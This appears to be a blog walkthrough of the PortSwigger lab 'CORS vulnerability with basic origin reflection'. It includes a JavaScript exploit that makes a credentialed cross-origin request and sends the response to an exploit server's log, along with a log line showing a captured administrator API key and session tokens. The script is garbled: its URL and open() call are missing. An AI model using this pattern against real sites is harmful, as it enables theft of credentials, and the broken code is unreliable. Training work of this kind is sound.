You are currently viewing Cross-origin resource sharing (CORS) vulnerabilities

Cross-origin resource sharing (CORS) vulnerabilities

What is Cross-origin resource sharing (CORS)

In Cross-origin resource sharing (CORS) vulnerabilities, Cross-Origin Resource Sharing is a security mechanism implemented in our web browsers. It controls the access to web application resources (such as fonts, scripts, images, etc.) from different origins through requests.

CORS vulnerabilities refer to situations where an attacker can exploit cross-origin resource sharing to compromise security.

Through CORS vulnerabilities, attackers can achieve vulnerabilities like CORS misconfiguration, cross-origin data leakage, cross-site request forgery (CSRF), etc.

Cross-origin resource sharing (CORS) Practical Labs

CORS vulnerability with basic origin reflection
CORS vulnerability with trusted null origin
CORS vulnerability with trusted insecure protocols

CORS vulnerability with basic origin reflection

Lab Description Of Cross-origin resource sharing (CORS)

This lab contains an insecure CORS configuration allowing all trusted origins. To solve the lab, you need to use JavaScript that utilizes CORS and retrieves the administrator’s API key. Upload the code to an exploit server. The lab will be solved when you submit the administrator’s API key.

You can use the username and password “wiener:peter” to log in to the lab.

Lab Solution Of Cross-origin resource sharing (CORS)

Cross-origin resource sharing (CORS) vulnerabilities

First, access the lab. After accessing it, open Burp Suite and enable the proxy in your browser.

Once you’ve done that, click on “my account” and log in using the provided credentials.

After logging in with Wiener’s account, you will see some details displayed.

Cross-origin resource sharing (CORS) vulnerabilities

You will receive a JSON-formatted GET /accountDetails request.

Send this request to the repeater tab for testing purposes.

Cross-origin resource sharing (CORS) vulnerabilities


Add an extra header to the request to see if the server allows it.

<script> var req = new XMLHttpRequest(); req.onload = reqListener;'get','',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script>

Replace “YOUR-LAB-ID” in the script with your lab ID (lab URL) and store it on the exploit server.

Cross-origin resource sharing (CORS) vulnerabilities

In my case, this is the lab ID:

Updated script version:

<script> var req = new XMLHttpRequest(); req.onload = reqListener;'get','',true); req.withCredentials = true; req.send(); function reqListener() { location='/log?key='+this.responseText; }; </script>
Cross-origin resource sharing (CORS) vulnerabilities

Copy this script and store it on the exploit server. Once stored, deliver the exploit to the victim.

After performing the above steps, click on “access log.”

Cross-origin resource sharing (CORS) vulnerabilities
"GET /log?key={%20%20%22username%22:%20%22administrator%22,%20%20%22email%22:%20%22%22,%20%20%22apikey%22:%20%22nsLocr7bLZH3jTHwol2DylLNqOgpgQBQ%22,%20%20%22sessions%22:%20[%20%20%20%20%22qo3kg91owDRqGJdpWGtMB3ZIkUzhpLQl%22,%20%20%20%20%22pF6dqwK6kCxLsp2NoRms54HG76NiPHwP%22%20%20]} HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/ Safari/537.36"

You can see that a GET request has provided me with the administrator’s API key.


Now, I will submit this key in the lab.

Now, I will submit this key in the lab.

By submitting the key in PortSwigger Web Security Lab, I have successfully solved the “CORS vulnerability with basic origin reflection” lab.

You can learn everything related to web security on our website. We upload the latest articles on web security topics on a daily basis, so stay with us.

Finally, you have completed the Cross-Site Scripting (XSS) topic and the next topic is Cross-Origin Resource Sharing (CORS), which you are currently reading. Please if you like the topic which is covered above then share it with your friends as well. The next topic to cover is WebSockets, Good Luck!

Also, Read Out: CORS Vulnerability With Trusted Insecure Protocols.


What is web security?

Website security refers to protecting a website or web application from cyberattacks, unauthorized access, or other security threats.

What is web application security?

Web application security means protecting a website from cyberattacks. These attacks may include vulnerabilities such as SQL injection, XSS, file inclusion, and others.

Which of the following is a good security practice for web browsing?

It is always a good practice to use an up-to-date browser with timely updates. Keep your browser plugins up-to-date, avoid malicious websites and links, and always enable 2-factor authentication while avoiding clickjacking.

How to find someone’s social security number on the dark web

Searching for someone’s social security number or credit card information on the dark web is illegal and unethical. It is important to always avoid such activities and protect yourself and others from cyber threats.

Leave a Reply